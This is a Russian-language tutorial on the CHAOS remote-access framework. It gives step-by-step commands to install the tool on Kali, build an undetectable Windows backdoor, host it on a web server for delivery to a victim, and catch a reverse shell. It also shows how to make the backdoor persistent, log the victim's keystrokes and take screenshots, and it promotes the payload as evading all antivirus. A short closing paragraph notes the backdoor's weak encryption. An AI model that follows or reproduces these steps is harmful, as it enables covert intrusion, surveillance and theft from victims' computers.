Chaos предназначен для предоставления злоумышленникам постоянного доступа к компьютерам, которые они могут использовать в преступных целях.

Chaos — это платформа, зависящая от Linux, с помощью которой вы можете без особых усилий создавать полезные нагрузки и управлять удаленными машинами, такими как Windows XP/Vista/7/8/8.1/10, Linux и Mac OSX. Другими словами, вы можете сказать, что Chaos Framework — это незначительный вариант платформы Metasploit, поскольку он имеет ограниченные возможности, которые вы можете использовать для достижения своей цели. Однако лучшее в Chaos то, что полезная нагрузка, которую он будет производить, на 100% FUD (полностью необнаружима).

Некоторые из особенностей этого инструмента; удаленно управлять любой машиной Windows, легко загружать/загружать любые файлы, сделать сеанс постоянным, поместив полезную нагрузку при запуске Windows, и получить сведения об операционной системе одним щелчком мыши.

Вы даже можете разыграть свою цель, например, открыть любой URL-адрес, разветвить бомбу и т. д.

Чтобы узнать больше о Chaos и получить инструкции по загрузке этого инструмента, посетите страницу «https://github.com/tiagorlampert/CHAOS» .

Чтобы установить этот фреймворк, нам нужно сначала загрузить два пакета, которые мы можем без особых усилий скачать из архива Kali Linux, составив следующую команду: (root@kali:/opt /CHAOS# apt install golang git –y).

Следующим шагом нам нужно получить следующий репозиторий: (root@kali:/opt# go get github.com/tiagorlampert/CHAOS).

Используйте следующие команды одну за другой, чтобы получить все необходимые зависимости для запуска Chaos без ошибок.

root@kali:/opt# go get github.com/kbinani/screenshot
root@kali:/opt# go get github.com/lxn/win
root@kali:/opt# go get github.com/matishsiao/goInfo
root@kali:/opt# go get golang.org/x/sys/windows

Чтобы запустить инструмент, нам нужно изменить наш каталог на репозиторий CHAOS (root@kali:/opt# cd ~/go/src/github .com/tiagorlampert/CHAOS) и запустите его с помощью команды go run main.go.

root@kali:~/go/src/github.com/tiagorlampert/CHAOS# go run main.go

Используйте клавишу “‹Tab›”, чтобы открыть окно подсказки с параметрами, которые можно использовать для создания полезной нагрузки.

Введите «generate», чтобы начать процесс, и после этого он запросит некоторую информацию о полезной нагрузке, такую ​​как «LHOST/LPORT/FILENAME» и т. д. ваш локальный IP-адрес в разделе LHOST, а для LPORT вы можете использовать любой порт; в данном случае мы использовали 8080. Затем укажите имя файла для вывода после команды «fname» и укажите платформу, на которую вы хотите ориентироваться. В этом примере мы будем скомпрометировать ОС Windows, поэтому мы использовали параметр “ -- windows.”

Подтвердите правильность всей информации, которую вы предоставили выше, и нажмите «Ввод», чтобы продолжить.

После завершения процесса создания полезной нагрузки бэкдор будет сохранен в следующем месте: «~/go/src/github.com/tiagorlampert/CHAOS/build/Windows/ILoveU». Нам нужно скопировать файл бэкдора и добавить его на наш веб-сервер, чтобы мы могли быстро доставить его целевой компьютер.

root@kali:~/go/src/github.com/tiagorlampert/CHAOS/build/Windows/ILoveU# cp ILoveU.exe /var/www/html/Hello_World/

Перед запуском этого вредоносного файла на компьютере жертвы нам нужно запустить прослушиватель, и это легко сделать во фреймворке Chaos, набрав "listen lport=[номер порта]".

Теперь давайте перейдем к целевому компьютеру и загрузим наш файл бэкдора.

Когда жертва загружает и запускает наш файл бэкдора, она отправляет обратное шелл-соединение на компьютер злоумышленника, как показано на скриншоте ниже.

Чтобы наш бэкдор всегда запускался при запуске, нам нужно включить режим персистентности, введя команду "persistence enable".

Введите “keylogger_start”, чтобы начать запись всех нажатий клавиш и вывести их с помощью команды “keylogger_show”.

Еще одна очень интересная функция этого инструмента заключается в том, что вы можете делать скриншоты целевого компьютера, выполнив команду "screenshot".

Если вы хотите использовать больше векторов атаки, вы всегда можете использовать команду "help" для отображения всех доступных параметров.

Бэкдор Chaos уникален тем, что выполняет обратную оболочку с полным сетевым шифрованием и проверкой целостности с использованием незаметных необработанных сокетов. Однако, поскольку предварительный общий ключ передается в виде простого текста, шифрование бэкдора может быть легко взломано, если оно будет идентифицировано.

Тот факт, что злоумышленники открывают порт 8080 для входящих пакетов, означает, что операторы хотят использовать двоичный файл клиента на зараженном компьютере, что является важным выводом. Они планировали использовать зараженный компьютер в качестве марионетки для дальнейших незаконных действий. В результате они могут пересекать границы сети.

Virustotal сообщает, что ни один антивирус не обнаруживает бэкдор, несмотря на то, что он существует уже несколько лет.